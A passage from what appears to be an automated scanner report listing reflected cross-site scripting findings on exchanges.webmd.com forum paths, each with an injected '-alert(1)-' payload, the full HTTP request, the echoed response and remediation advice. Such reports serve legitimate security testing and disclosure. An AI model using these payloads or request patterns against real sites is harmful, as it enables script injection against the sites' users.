<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/parenting-exchanges?f2785"-alert(1)-"fced948cb12=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.42. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/pregnancy-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87ef7'-alert(1)-'a2c8c40a0fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges87ef7'-alert(1)-'a2c8c40a0fc/pregnancy-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59536
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:40 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges87ef7'-alert(1)-'a2c8c40a0fc%252fpregnancy-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.43. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/pregnancy-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32a56'-alert(1)-'a9d18542197 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/pregnancy-exchanges32a56'-alert(1)-'a9d18542197 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59536
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:52 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fpregnancy-exchanges32a56'-alert(1)-'a9d18542197&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.44. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/pregnancy-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4948'-alert(1)-'50d65f45c5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/pregnancy-exchanges?c4948'-alert(1)-'50d65f45c5c=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73372
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:27 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2fpregnancy-exchanges%3fc4948'-alert(1)-'50d65f45c5c%3d1&artid=091e9c5e80561ab8&inst=0&amp;leaf=">
...[SNIP]...

1.45. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/pregnancy-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fe19"-alert(1)-"066c8de0019 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/pregnancy-exchanges?5fe19"-alert(1)-"066c8de0019=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73390
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:26 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/pregnancy-exchanges?5fe19"-alert(1)-"066c8de0019=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.46. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/sex-relationships-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9c8b'-alert(1)-'50fa5ae1c70 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchangesa9c8b'-alert(1)-'50fa5ae1c70/sex-relationships-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59560
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:07 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchangesa9c8b'-alert(1)-'50fa5ae1c70%252fsex-relationships-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.47. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/sex-relationships-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cd08'-alert(1)-'d156ed31468 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/sex-relationships-exchanges8cd08'-alert(1)-'d156ed31468 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59560
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:19 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fsex-relationships-exchanges8cd08'-alert(1)-'d156ed31468&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.48. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/sex-relationships-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56a41'-alert(1)-'816ff3601e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/sex-relationships-exchanges?56a41'-alert(1)-'816ff3601e9=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66812
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:56 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
tionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2fsex-relationships-exchanges%3f56a41'-alert(1)-'816ff3601e9%3d1&artid=091e9c5e8055d1b0&inst=0&amp;leaf=">
...[SNIP]...

1.49. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/sex-relationships-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21ab4"-alert(1)-"bf6089d9642 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/sex-relationships-exchanges?21ab4"-alert(1)-"bf6089d9642=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66824
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:55 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/sex-relationships-exchanges?21ab4"-alert(1)-"bf6089d9642=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.50. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/trying-to-conceive-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6610'-alert(1)-'7de7f94fa7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchangesb6610'-alert(1)-'7de7f94fa7a/trying-to-conceive-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59563
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:42 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchangesb6610'-alert(1)-'7de7f94fa7a%252ftrying-to-conceive-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.51. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/trying-to-conceive-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eeda8'-alert(1)-'e25056739 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/trying-to-conceive-exchangeseeda8'-alert(1)-'e25056739 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59557
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:54 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252ftrying-to-conceive-exchangeseeda8'-alert(1)-'e25056739&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.52. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/trying-to-conceive-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50e6d"-alert(1)-"ab799eb0e25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/trying-to-conceive-exchanges?50e6d"-alert(1)-"ab799eb0e25=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71080
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:28 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/trying-to-conceive-exchanges?50e6d"-alert(1)-"ab799eb0e25=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.53. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/trying-to-conceive-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac74c'-alert(1)-'192a93c0ff0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/trying-to-conceive-exchanges?ac74c'-alert(1)-'192a93c0ff0=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71060
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:29 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
ionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2ftrying-to-conceive-exchanges%3fac74c'-alert(1)-'192a93c0ff0%3d1&artid=091e9c5e805cbf41&inst=0&amp;leaf=">
...[SNIP]...

1.54. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/womens-health-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 143b5'-alert(1)-'e20daef9f7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges143b5'-alert(1)-'e20daef9f7d/womens-health-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59548
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:20 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges143b5'-alert(1)-'e20daef9f7d%252fwomens-health-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.55. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/womens-health-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4fe4'-alert(1)-'9a71d5e7389 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/womens-health-exchangesa4fe4'-alert(1)-'9a71d5e7389 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59548
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:33 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
sID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fwomens-health-exchangesa4fe4'-alert(1)-'9a71d5e7389&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.56. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/womens-health-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 234df"-alert(1)-"24c278a6922 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

